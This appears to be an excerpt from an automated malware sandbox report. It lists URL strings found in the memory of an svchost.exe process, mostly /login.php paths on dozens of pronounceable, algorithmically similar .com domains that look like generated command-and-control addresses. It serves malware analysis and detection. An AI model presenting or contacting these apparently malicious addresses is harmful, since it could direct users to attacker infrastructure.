Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjux.com/
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylan.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916085702.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906280204.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytin.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/http://lykyvyx.com/http://vopyrik.com/http://vopyrik.com/H
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywex.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygor.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1915969207.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylij.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/
Source: svchost.exe, 00000002.00000003.1902716181.0000000008A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysox.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytar.com/login.php
Source: svchost.exe, 00000002.00000003.1744736158.0000000008AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytux.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyved.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxir.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjej.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryman.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/login.php
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796369043.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744210014.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrysor.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887249812.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytod.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvaj.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvex.com/H
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvur.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywur.com/H
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxen.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfed.com/login.php
Source: svchost.exe, 00000002.00000003.1875548000.0000000002F49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/
Source: svchost.exe, 00000002.00000003.1870965504.0000000002F45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875548000.0000000002F49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/p2
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyjex.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1837754876.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845150942.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844520278.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845472203.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844020090.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysylej.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysymor.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysymor.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1866818610.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysymux.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysynaj.com/
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871067961.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysynaj.com/login.php
Source: svchost.exe, 00000002.00000003.1943881239.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1341813350.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744793838.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1361292804.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1341912346.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1340306106.0000000008AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysynur.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936268348.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysysir.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysysod.com/http://pumylel.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysysyx.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytoj.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytyr.com/login.php
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818447804.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816434149.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvax.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvud.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxar.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyfux.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygon.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygon.com/H
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyguj.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936268348.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyjoj.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyjyr.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylod.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvynid.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvysaj.com/login.php
Source: svchost.exe, 00000002.00000003.1874151632.0000000008A7F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytan.com/login.php
Source: svchost.exe, 00000002.00000003.1874151632.0000000008A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytan.com/login.php9
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyver.com/login.php
Source: svchost.exe, 00000002.00000003.1929704331.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947165935.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937315639.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1933122469.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywar.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywux.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxin.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxyj.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxyj.com/login.phpg
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfuj.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1897873188.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfuj.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygax.com/login.php
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796369043.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816434149.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjaj.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxylyj.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynir.com/login.php
